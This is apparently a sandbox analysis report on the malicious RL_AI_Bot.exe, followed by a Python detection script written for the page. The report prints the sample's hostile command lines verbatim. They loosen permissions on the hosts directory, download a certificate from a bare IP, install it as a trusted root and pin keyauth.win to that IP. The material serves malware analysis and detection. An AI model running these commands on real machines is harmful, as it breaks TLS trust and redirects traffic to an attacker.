Analysis Overview
SHA256
c388a38e46a212f9413d41a9f28265a2fe1c7c77b3620bfcdcc6c7b4b3b9dee0
Threat Level: Likely malicious
The file RL_AI_Bot.exe was found to be: Likely malicious.
Malicious Activity Summary
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Blocklisted process makes network request
Possible privilege escalation attempt
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Checks BIOS information in registry
Executes dropped EXE
Themida packer
Modifies file permissions
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger
AutoIT Executable
Hide Artifacts: Ignore Process Interrupts
Unsigned PE
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Gathers network information
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-05 00:19
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-05 00:19
Reported
2024-10-05 00:20
Platform
win11-20240802-en
Max time kernel
33s
Max time network
35s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\cmd.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A |
Hide Artifacts: Ignore Process Interrupts
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe
"C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c @echo off & echo Running fix.bat silently... & start "" /min /b cmd /c "C:\Users\Admin\AppData\Local\Temp\fix.bat & exit"
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\fix.bat & exit"
C:\Windows\system32\takeown.exe
takeown /F C:\Windows\System32\drivers\etc /R /A
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\etc /grant administrators:F /T
C:\Windows\system32\certutil.exe
certutil -store TrustedRoot
C:\Windows\system32\findstr.exe
findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Invoke-WebRequest -Uri http://188.227.107.14/server.crt -OutFile 'C:\Users\Admin\AppData\Local\Temp\server.crt'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\server.crt" SHA256
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\server.crt" SHA256
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Import-Certificate -FilePath 'C:\Users\Admin\AppData\Local\Temp\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -store TrustedRoot | findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
C:\Windows\system32\certutil.exe
certutil -store TrustedRoot
C:\Windows\system32\findstr.exe
findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
C:\Windows\system32\findstr.exe
findstr /C:"188.227.107.14 keyauth.win" "C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Users\Admin\AppData\Local\Temp\RL_AI.exe
C:\Users\Admin\AppData\Local\Temp\RL_AI.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\RL_AI.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\RL_AI.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
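The process tree above is the whole of what fix.bat does: takeown and icacls loosen the ACL on C:\Windows\System32\drivers\etc, PowerShell fetches server.crt from 188.227.107.14 over plain HTTP and imports it into Cert:\LocalMachine\Root, findstr confirms that the hosts file now carries the line "188.227.107.14 keyauth.win", and ipconfig /flushdns makes the pin take effect. From then on, connections to keyauth.win (the name RL_AI.exe contacts over TCP 443 in the Network section, resolving to that same IP) terminate at 188.227.107.14 and validate against a root certificate that host supplied. The Python below is an added detection example written for this page; it is not part of the sandbox output or of the sample. It runs rules over process-creation records constructed from the command lines above (the image/cmdline field names are an assumed schema, not any specific EDR's) and parses a constructed hosts file containing the line the sample's own findstr checks for.

```python
"""Detection rules for the hosts-file pin + rogue root CA chain in this report.

Added example for this analysis page, not part of the sandbox output or of the
sample itself. The process records below are constructed from the command lines
in the Processes section; the image/cmdline field names are an assumed schema.
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str      # full path of the executable (assumed field name)
    cmdline: str    # command line as logged (assumed field name)


# Constructed from the report's Processes section, plus one benign control.
EVENTS = [
    ProcessEvent(r"C:\Windows\system32\takeown.exe",
                 r"takeown /F C:\Windows\System32\drivers\etc /R /A"),
    ProcessEvent(r"C:\Windows\system32\icacls.exe",
                 r"icacls C:\Windows\System32\drivers\etc /grant administrators:F /T"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'''powershell.exe -Command "Invoke-WebRequest -Uri http://188.227.107.14/server.crt '''
                 r'''-OutFile 'C:\Users\Admin\AppData\Local\Temp\server.crt'"'''),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'''powershell.exe -Command "Import-Certificate -FilePath 'C:\Users\Admin\AppData\Local\Temp\server.crt' '''
                 r'''-CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"'''),
    ProcessEvent(r"C:\Windows\system32\ipconfig.exe", "ipconfig /flushdns"),
    ProcessEvent(r"C:\Windows\system32\certutil.exe",   # benign control: must not fire
                 r'certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\server.crt" SHA256'),
]

HOSTS_DIR = re.compile(r"\\drivers\\etc\b", re.I)
# Import-Certificate into the machine root store, or certutil -addstore [-f] root.
ROOT_STORE = re.compile(r'Cert:\\LocalMachine\\Root|-addstore\s+(?:-f\s+)?"?root"?', re.I)
BARE_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?=[:/\s\"']|$)", re.I)
DOWNLOADERS = ("invoke-webrequest", "iwr ", "downloadstring", "downloadfile", "curl ", "bitsadmin")


def classify(ev: ProcessEvent) -> list[str]:
    """Return the names of the rules that fire on a single process record."""
    image = ev.image.lower().rsplit("\\", 1)[-1]
    cmd = ev.cmdline.lower()
    hits: list[str] = []
    # ACL tampering on the directory that holds the hosts file (takeown/icacls).
    if image in ("takeown.exe", "icacls.exe") and HOSTS_DIR.search(ev.cmdline):
        hits.append("acl_tamper_hosts_dir")
    # A certificate being pushed into the machine-wide trusted root store.
    if ROOT_STORE.search(ev.cmdline) and ("import-certificate" in cmd or image == "certutil.exe"):
        hits.append("root_ca_install")
    # A download whose URL names a bare IP rather than a hostname.
    if BARE_IP_URL.search(ev.cmdline) and any(k in cmd for k in DOWNLOADERS):
        hits.append("bare_ip_download")
    # A DNS cache flush right after a hosts write is what makes the pin take effect.
    if image == "ipconfig.exe" and "/flushdns" in cmd:
        hits.append("dns_cache_flush")
    return hits


def scan(events: list[ProcessEvent]) -> dict[str, list[str]]:
    """Group the matching command lines by rule name."""
    findings: dict[str, list[str]] = {}
    for ev in events:
        for rule in classify(ev):
            findings.setdefault(rule, []).append(ev.cmdline)
    return findings


def rogue_hosts_entries(hosts_text: str) -> list[tuple[str, str]]:
    """(ip, name) pairs that pin a hostname to something other than loopback or 0.0.0.0."""
    out: list[tuple[str, str]] = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            continue
        if ip.is_loopback or ip.is_unspecified:
            continue
        out.extend((str(ip), n.lower()) for n in names)
    return out


# Constructed hosts file: stock entries plus the line the sample's findstr looks for.
SAMPLE_HOSTS = """\
# Constructed sample, not the detonation's actual file.
127.0.0.1       localhost
::1             localhost
0.0.0.0         telemetry.example.invalid   # sink-holed entry, not suspicious
188.227.107.14 keyauth.win
"""


def chain_detected(events: list[ProcessEvent], hosts_text: str) -> bool:
    """True when ACL tampering, a root CA install and a non-loopback hosts pin all coexist."""
    findings = scan(events)
    return ({"acl_tamper_hosts_dir", "root_ca_install"}.issubset(findings)
            and bool(rogue_hosts_entries(hosts_text)))


if __name__ == "__main__":
    for rule, cmds in scan(EVENTS).items():
        print(f"[{rule}]")
        for c in cmds:
            print("    ", c)
    print("rogue hosts entries:", rogue_hosts_entries(SAMPLE_HOSTS))
    print("chain detected:", chain_detected(EVENTS, SAMPLE_HOSTS))
```

The ACL rule fires on both takeown and icacls because either one alone is enough to undo the protection on the hosts directory; the root-store rule also covers certutil -addstore root, the other common way a batch file installs a CA. Any one rule in isolation is noisy (administrators do flush DNS and import certificates), so chain_detected is the alert condition; the individual hits are the triage context. In a real pipeline the input would be Sysmon Event ID 1 or equivalent process-creation telemetry rather than the constructed list, and the hosts file would be read from the endpoint.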
Network
| Country | Destination | Domain | Proto |
| NL | 188.227.107.14:80 | 188.227.107.14 | tcp |
| US | 8.8.8.8:53 | 14.107.227.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| NL | 188.227.107.14:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:49797 | N/A | tcp |
| N/A | 127.0.0.1:49799 | N/A | tcp |
| NL | 188.227.107.14:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:49806 | N/A | tcp |
| N/A | 127.0.0.1:49808 | N/A | tcp |
| N/A | 127.0.0.1:49813 | N/A | tcp |
| N/A | 127.0.0.1:49815 | N/A | tcp |
| NL | 188.227.107.14:443 | keyauth.win | tcp |
| NL | 188.227.107.14:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:49818 | N/A | tcp |
| N/A | 127.0.0.1:49820 | N/A | tcp |
| NL | 188.227.107.14:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:49824 | N/A | tcp |
| N/A | 127.0.0.1:49826 | N/A | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\autA151.tmp
| MD5 | 898bbb4fac0d31cacf8bd6f0ea1dcd14 |
| SHA1 | cbc25afd3e39ec0b030a6148ad44ae882ad063be |
| SHA256 | 87f84086ae3ebd38fe6df4c2a90cc2064787c9a863bb279cc278467aa2f0edc9 |
| SHA512 | 66848d109d566c7f6c273c86b0a8611340e46534a4f028f91091d06900448c95c4093bd987c06a2be4c246ded5c6baa8de3d03049f4cfa49da9b360e6b5a2ec4 |
C:\Users\Admin\AppData\Local\Temp\fix.bat
| MD5 | ded50caaa850f5278662834fd32021ae |
| SHA1 | 2bd1354b58408585a5ef862838cb97f7ab1f219c |
| SHA256 | 9847b9305180be84090dc361c21bfc002223309fbf22a991b5396bf5a5fd79d3 |
| SHA512 | d8286d37a412aa73cd97f0a5321825f5bf138e91069477e4dddfbfcc0835723606a692da858b4331d2f127b50d2154d81fd98bd08d0a1d0904b63e07de689620 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e0i3atge.wxq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4824-18-0x000001C65FBF0000-0x000001C65FC12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\server.crt
| MD5 | 5663fb32607a5562453a8125a8f812c4 |
| SHA1 | 764264efe0329df2a961dca0e45efc70878bfed7 |
| SHA256 | f6b3ca3c38d3efebe9a1e98f6042807f087688586c93513bae631fe24e1fe81e |
| SHA512 | 31b05f2d170b77ca4cfe298e913e0c07a7b5e57fbe4f1296b8b616729564f32fc3f53c6993f51dd50015aba808ae4c59560155119556e76744990cef68ef4b86 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5f4c933102a824f41e258078e34165a7 |
| SHA1 | d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee |
| SHA256 | d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2 |
| SHA512 | a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5e6baeec02c3d93dce26652e7acebc90 |
| SHA1 | 937a7b4a0d42ea56e21a1a00447d899a2aca3c28 |
| SHA256 | 137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0 |
| SHA512 | 461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4 |
C:\Windows\System32\drivers\etc\hosts
| MD5 | 81051bcc2cf1bedf378224b0a93e2877 |
| SHA1 | ba8ab5a0280b953aa97435ff8946cbcbb2755a27 |
| SHA256 | 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6 |
| SHA512 | 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d |
memory/4836-43-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp
memory/4836-45-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp
memory/4836-47-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp
memory/4836-46-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp
memory/4836-48-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp
memory/4836-51-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp
memory/4836-54-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp
memory/4836-55-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp
memory/4836-57-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp